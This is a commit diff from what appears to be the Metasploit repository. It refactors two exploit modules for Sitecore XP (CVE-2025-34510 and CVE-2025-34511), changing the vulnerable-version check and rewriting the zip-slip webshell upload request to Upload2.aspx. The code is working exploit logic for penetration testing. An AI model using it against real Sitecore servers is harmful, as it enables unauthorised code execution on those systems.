Skip to content

Commit 5ab864b

Browse files
msutovsky-r7msutovsky-r7
committed
Uses between? for version check, clearer webshell upload
1 parent 00bd707 commit 5ab864b

File tree

2 files changed

+14
-49
lines changed

2 files changed

+14
-49
lines changed

modules/exploits/windows/http/sitecore_xp_cve_2025_34510.rb

Lines changed: 13 additions & 48 deletions
Original file line numberDiff line numberDiff line change
@@ -70,7 +70,7 @@ def check
7070

7171
sitecore_version = get_version
7272

73-
return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version <= Rex::Version.new('10.4') && sitecore_version >= Rex::Version.new('10.0.0')
73+
return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))
7474

7575
Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable")
7676
end
@@ -307,57 +307,22 @@ def upload_zipslip
307307

308308
zip_data = zip.pack
309309

310-
boundary = Rex::Text.rand_text_alphanumeric(31).to_s
311-
312-
data_post = "------geckoformboundary#{boundary}\r\n"
313-
data_post << "Content-Disposition: form-data; name=\"__CSRFTOKEN\"\r\n\r\n"
314-
data_post << "#{hidden_inputs.dig(0, '__CSRFTOKEN')}\r\n"
315-
data_post << "------geckoformboundary#{boundary}\r\n"
316-
317-
data_post << "Content-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n"
318-
data_post << "#{view_state['value']}\r\n"
319-
data_post << "------geckoformboundary#{boundary}\r\n"
320-
321-
data_post << "Content-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n"
322-
data_post << "\r\n"
323-
data_post << "------geckoformboundary#{boundary}\r\n"
324-
325-
data_post << "Content-Disposition: form-data; name=\"Item\"\r\n\r\n"
326-
data_post << "#{hidden_inputs.dig(0, 'Item')}\r\n"
327-
data_post << "------geckoformboundary#{boundary}\r\n"
328-
329-
data_post << "Content-Disposition: form-data; name=\"Language\"\r\n\r\n"
330-
data_post << "#{hidden_inputs.dig(0, 'Language')}\r\n"
331-
data_post << "------geckoformboundary#{boundary}\r\n"
332-
333-
data_post << "Content-Disposition: form-data; name=\"Path\"\r\n\r\n"
334-
data_post << "#{hidden_inputs.dig(0, 'Path')}\r\n"
335-
data_post << "------geckoformboundary#{boundary}\r\n"
336-
337-
data_post << "Content-Disposition: form-data; name=\"Unzip\"\r\n\r\n"
338-
data_post << "1\r\n"
339-
data_post << "------geckoformboundary#{boundary}\r\n"
340-
341-
data_post << "Content-Disposition: form-data; name=\"Overwrite\"\r\n\r\n"
342-
data_post << "#{hidden_inputs.dig(0, 'Overwrite')}\r\n"
343-
data_post << "------geckoformboundary#{boundary}\r\n"
344-
345-
data_post << "Content-Disposition: form-data; name=\"#{file_param}\"; filename=\"#{fake_zip}\"\r\n"
346-
data_post << "Content-Type: application/zip\r\n\r\n"
347-
data_post << "#{zip_data}\r\n"
348-
data_post << "------geckoformboundary#{boundary}\r\n"
349-
350-
data_post << "Content-Disposition: form-data; name=\"#{new_file_input}\"; filename=\"\"\r\n"
351-
data_post << "Content-Type: application/octet-stream\r\n\r\n"
352-
data_post << "\r\n"
353-
data_post << "------geckoformboundary#{boundary}\r\n"
354-
310+
vars_form_data = [
311+
{ 'name' => '__CSRFTOKEN', 'data' => hidden_inputs.dig(0, '__CSRFTOKEN') },
312+
{ 'name' => '__VIEWSTATE', 'data' => view_state['value'] },
313+
{ 'name' => 'Item', 'data' => hidden_inputs.dig(0, 'Item') },
314+
{ 'name' => 'Language', 'data' => hidden_inputs.dig(0, 'Language') },
315+
{ 'name' => 'Path', 'data' => hidden_inputs.dig(0, 'Path') },
316+
{ 'name' => 'Unzip', 'data' => '1' },
317+
{ 'name' => 'Overwrite', 'data' => hidden_inputs.dig(0, 'Overwrite') },
318+
{ 'name' => file_param, 'data' => zip_data, 'content_type' => 'application/zip', 'encoding' => 'binary', 'filename' => fake_zip },
319+
{ 'name' => new_file_input, 'data' => '', 'content_type' => 'application/octet-stream', 'filename' => '' }
320+
]
355321
res = send_request_cgi({
356322
'method' => 'POST',
357323
'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),
358324
'vars_get' => { 'hdl' => 'sc_ct_trk' },
359-
'data' => data_post,
360-
'ctype' => "multipart/form-data; boundary=----geckoformboundary#{boundary}"
325+
'vars_form_data' => vars_form_data
361326
})
362327

363328
return false unless res&.code == 200 && res.body.include?('Done')

modules/exploits/windows/http/sitecore_xp_cve_2025_34511.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -77,7 +77,7 @@ def check
7777

7878
return Exploit::CheckCode::Safe('PowerShell extension not detected, might not be installed in target Sitecore instance') unless res&.code == 200
7979

80-
return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version <= Rex::Version.new('10.4') && sitecore_version >= Rex::Version.new('10.0.0')
80+
return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))
8181

8282
Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable")
8383
end

0 commit comments

Comments
 (0)